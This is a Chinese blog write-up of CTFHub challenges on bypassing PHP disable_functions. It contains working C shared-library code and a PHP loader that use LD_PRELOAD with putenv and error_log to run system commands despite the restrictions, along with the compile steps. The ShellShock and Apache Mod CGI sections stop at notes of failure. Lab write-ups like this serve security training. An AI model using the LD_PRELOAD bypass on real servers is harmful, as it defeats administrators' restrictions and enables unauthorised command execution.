CTFHub-bypass disable_function

最新推荐文章于 2024-03-01 21:12:43 发布
最新推荐文章于 2024-03-01 21:12:43 发布
阅读量775 收藏 2
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a21536545645/article/details/118614836
版权

一,LD_PRELOAD

前置知识:
putenv:php函数,可以设置环境变量
mail(),error_log(): php的函数,会调用系统的sendmail函数发送邮件
LD_PRELOAD:linux环境变量,作用是他设置的.so会在程序本身的.so之前执行。

题目情况

存在一个shell,用蚂剑直接连接。进入虚拟终端执行命令发现ret=127,说明不能执行系统命令
在这里插入图片描述
/?ant=phpinfo();看到禁用了很多函数
在这里插入图片描述但是没有禁用putenv,error_log,email这几个函数

思路

创建一个shell.so文件,然后再创建一个个shell.php文件,再shell.php中设置环境变量加载shell.so,然后运行error_log函数,这两个函数会调用系统的.so,但是我们的shell.so会先加载,这个shell.so就会执行恶意代码。

实现

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

__attribute__ ((__constructor__)) void hausa_zui_shuai(void)
{
    unsetenv("LD_PRELOAD");
    system("echo any_other_eval_code");
    system("/readflag > /tmp/hausa.txt");
}

attribute ((constructor))这个参数,可以读一下参考博文,它使得被自己修饰的函数在main函数前执行。 然后在本地Linux虚拟机上运行gcc -shared -fPIC hack.c -o
eval.so将这个源文件编译成动态链接库文件,并将其上传到服务器的/tmp目录下。

<?Php
putenv("LD_PRELOAD=/tmp/shell.so");
error_log("",1,"","");
?>

把这个shell.php上传到目标服务器的根目录,然后访问他,再去访问/tmp/hausa.txt就可以得到flag

劫持系统函数
一,重写要被调用的方法(复现失败。。)
创建共享库A重写C方法,
php函数创建新进程,新进程调用系统函数,系统函数调用共享库B中的C方法,设置环境变量让A库优先级高于B库,执行php函数

#include <stdlib.h>
#include <stdio.h>

void payload() {
        system("/readflag > /tmp/flag");
}

int getuid(){
        if(getenv("LD_PRELOAD") == NULL) return 0;
        unsetenv("LD_PRELOAD");
        payload();
}

二,利用__attribute__ 使得被修饰的函数在main()之前执行
php函数创建新进程,新进程调用系统函数,系统函数调用共享库B中的C方法,设置环境变量让A库优先级高于B库,执行php函数

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
__attribute__ ((__constructor__)) void xxx (void){
    unsetenv("LD_PRELOAD");
    system("/readflag > /tmp/flag");
}

参考文章:https://blog.csdn.net/qq_42851946/article/details/106248177

二,ShellShock

webshell连不上去。。

三,Apache Mod CGI

这道题好像有问题,这个为空的话就导致不能够重载.htaccess文件了
在这里插入图片描述
这个系列的题真是太硬了。。感觉已经超出了基础漏洞的难度,为了绕过往往要结合多个方面的知识。。。现在还太菜了,等以后再来做吧。。

HTSsec
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
蚁剑的能绕过disable_functions的插件
06-21
蚁剑的能绕过disable_functions的插件,插件无法下载问题
记一次渗透进学弟服务器Getshell的过程
落日领航员の技术栈
09-06 1602
0x00 写在前面 首先说一句,我真的好久 好久 好久 好久 好久没碰过渗透了,一方面是因为太菜,之前从来都没完整的走完一套getshell,半路卡住是常有,做着做着就give up;另一方面是从实习以来一直做的是安全开发相关的工作,以后工作方向大概率也是安全开发而不是攻防。 那为什么我会忽然想起搞学弟的网站呢?事情是这样的,之前有指导过学弟怎么搭建一套作业提交系统,然后学弟就开始自己研究,中间过了好久,我也忘了这码事。 今天晚上他忽然来找我 顺便问他要了网址,也想登上去看看是啥样 本来以为就是个简单的作
针对校园某服务器的一次渗透测试
zhangge3663的博客
01-31 2470
发现学校其中一台服务器可能(绝对)存在漏洞。我想(绝对)能拿下它; 而且渗透测试的过程很有趣,便将其记录下来。 0x00 前期交互及信息收集 由于是对内网直接进行大扫描,所以直接判断这不仅是一个Web服务器(多个),同时还运行着FTP、数据库。 在此,再次使用nmap扫描一次,结果如下: $ sudo nmap -T4 -n -sS -sV -O 192.168.3.72Nmap scan report for 192.168.3.72Host is up (0.00076s late..
CTFHub LD_PRELOAD“wp(详解)
最新发布
m0_73195494的博客
03-01 930
打开界面发现如图所示的代码,显然可以通过蚁剑进行连接,连接成功在目录下找到flag文件,但flag打开为空,于是打开终端,发现对于发出的命令均返回ret=127,说明是disable_functions(禁用函数)生效,查看phpinfo,发现禁用了许多函数。
CTFhub Bypass disable_function LD_PRELOAD
qq_41497476的博客
07-29 726
基本做完了基础题目,开始进入进阶的题了,第一道题给我整懵了。知识盲区 <!DOCTYPE html> <html> <head> <title>CTFHub Bypass disable_function —— LD_PRELOAD</title> </head> <body> <h1>CTFHub Bypass disable_function —— LD_PRELOAD</h1> <
CTFHUB-数字ip bypass(小宇特详解)
小宇的web博客
10-21 637
CTFHUB-数字ip bypass 1.这里先看一下题目 这里ban掉了127和172这里不能使用常规的ip地址了 这里可以使用ip转化器来进行 这里将十进制的ip地址输入是一下 ?url=http://2130706433/flag.php 还有其他类型的绕过可以去看我的上一篇文章 (34条消息) CTFHUB-URL Bypass(小宇特详解)+ssrf绕过方法_小宇的web博客-CSDN博客 ...
CTFHUB-URL Bypass(小宇特详解)+ssrf绕过方法
小宇的web博客
10-21 7009
CTFHUB-URL Bypass 这里的要求是请求的URL中必须包含http://notfound.ctfhub.com 这里我第一时间想到的是绕过。 这里先用@来绕过 http://notfound.ctfhub[email protected]/flag.php 这里由于必须含有指定的网址,所以不能用数字ip法,这里使用@后访问的是后面的网址 这里说一下绕ssrf的办法 1.攻击本地 http://127.0.0.1:80 http://localhost:22 2.利用[::] http://[::]
CTFHub Bypass disable_function系列(已完结)
feng的博客
10-14 3548
LD_PRELOAD 首先我们需要了解LD_PRELOAD这个环境变量,这里有两篇文章可以参考: 警惕UNIX下的LD_PRELOAD环境变量 利用环境变量LD_PRELOAD来绕过php%20disable_function 读完之后就会对LD_PRELOAD这个环境变量有所了解,知道了它是干什么的,但是对于如何利用还不太清楚。 利用这个环境变量的话,可以使用这些函数: putenv() error_log() mail() LD_PRELOAD是Linux系统的一个环境变量,它可以影响程序的运行时
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
configurationFile配置文件解密
从ByteCTFbypass_disable_function1
08-03
2021/9/12 下午9:37从ByteCTFbypass_disable_function | Z3ratu1's bloghttps://blog.z3
bypass-paywalls-chrome-master_bypass_sitetemplate_
09-29
Bypass website paywalls
VB-UAC-BYPASS.rar_VB 提权_bypass uac_vb uac_提权_模拟CMD
09-22
UAC欺骗VB源码 UAC提权 模拟弹出一个CMD欺骗
文件上传之00截断分析
a21536545645的博客
08-12 3595
原理 php是基础c语言实现的,C语言中认为0x00是结束符号,文件上传之所以可以00截断,是因为白名单判断的时候是判断后缀,在进行路径拼接的时候用的其他值,然后在进行move_uploaded_file的时候,这个函数读取到hex值为00的字符,认为读取结束,出现00截断 例如上传图片1.png,filename为1.png,save_path为…/upload/1.php%00 我们看在代码层面会发生什么 1,取后缀名: $file_ext=png 后缀名在白名单中,符合 2,拼接上传
常见编码方式
a21536545645的博客
07-05 818
在学习渗透的时候遇到很多不同的编码,把我搞的晕乎乎的,准备总结一下常见的一些编码方式,加深自己的理解。 一, URL编码 1.背景 引起歧义:url对于表单的参数是以键值对的形式例如key1=value1,对于多个键值对之间用&连接,例如/?key1=value1&key2=value2.如果在键值对中有这些字符的话就会引起歧义 非法字符:因为url采用ascll编码,对于非数字和字母的字符,例如汉字,就会出问题 。总之不是ascll的字符就要进行编码 在提交url参数的时候进行编码 2
Redis中利用SSRF写webshell
a21536545645的博客
07-06 338
前置知识: curl详解 gopher详解 redis详解 利用过程: 用redis语法写shell 用工具或者脚本把shell转化为符合RESP协议的格式 在目标主机上curl gopher 运行编码后的shell 菜刀蚂剑连接shell 具体参考这篇文章 注意: shell中目标的端口应该是6379(redis的端口) 复现的时候注意关闭防火墙,并且打开6379端口 当出现拒绝访问的时候:ip不对;端口问题;防火墙 在ubuntu中打payload提示目录不在,百度一下有说是因为安装账号对这个目
CTFHub-SSRF
a21536545645的博客
07-07 289
原理: 有可控参数,并且这个可控参数可以用来访问其他网络,服务。那么就可以用这个参数,以目标主机为跳板,访问内网的资源或者访问外网。 一,内网访问 审题很重要 只有一个链接 根据提示访问127.0.0.1/flag.php就可以得到flag,但是用localhost就不行,应该是后台做了限制 后台的代码应该类似这样: <?php highlight_file(__FILE__); $url=$_GET['url']; $curl=curl_init($url); $res
基础漏洞—RCE
a21536545645的博客
07-09 279
一,漏洞原理 代码执行:在php中的表现是exec()等函数把用户输入的数据不严格过滤就当作了代码来执行 命令执行:php中就是shell_exec等函数把用户输入的数据当作命令执行 本质:其实就是把用户输入的数据,在不进行严格过滤的情况下,当成了命令或者代码来执行。 二,危险函数 system() passthru() exec() shell_exec() popen() proc_open() pcntl_exec() 修复方案 php.ini的disable_functions中禁用相关危险
CTFHub-RCE
a21536545645的博客
07-05 187
一,介绍 RCE是远程代码/命令执行,可以直接在目标主机上执行代码或者命令,危害极大。一般是因为对输入的过滤不严格导致,常见于有调用系统命令或者调用代码执行函数的地方。 二,命令注入 后台直接执行系统命,一般要结合linux,windows的管道对要执行的命令进行拼接。 过滤的话大致分为两种情况:白名单,黑名单 黑名单是过滤到一些常用的参数,如果过滤的不全面可以考虑用其他相同功能的函数代替;如果黑名单比较全面,那就要考虑用编码的方式尝试绕过。 白名单是限制参数的使用范围,写死了的话应该常规的办法就没有用了
as_bypass_php_disable_functions-master
09-17
as_bypass_php_disable_functions-master是一个可以绕过PHP禁用函数的项目。 在PHP中,禁用函数是一种安全措施,用于限制脚本执行时可以调用的函数。这样可以防止恶意代码的执行,提高服务器的安全性。 然而,有时候我们可能需要在某些情况下调用被禁用的函数,例如一些特殊的需求或者调试目的。这时候,as_bypass_php_disable_functions-master就能帮助我们绕过这些禁用函数的限制。 该项目通过利用PHP的一些特性和漏洞,向PHP进程添加自定义扩展或修改PHP源代码的方式,以实现绕过禁用函数的效果。 使用这个项目需要一定的PHP编程知识和经验。首先,我们需要将项目中的代码部署到服务器上。然后,根据自己的需求,参考项目文档中的说明进行配置。 在项目运行后,我们就可以使用被禁用的函数了。但是需要注意的是,使用这个项目绕过禁用函数可能会带来一些风险和安全隐患。因此,我们应该谨慎使用,并确保代码的安全性。 总之,as_bypass_php_disable_functions-master是一个用于绕过PHP禁用函数的项目,可以帮助我们在特殊情况下调用被禁用的函数。但是使用时需要注意安全性和潜在的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值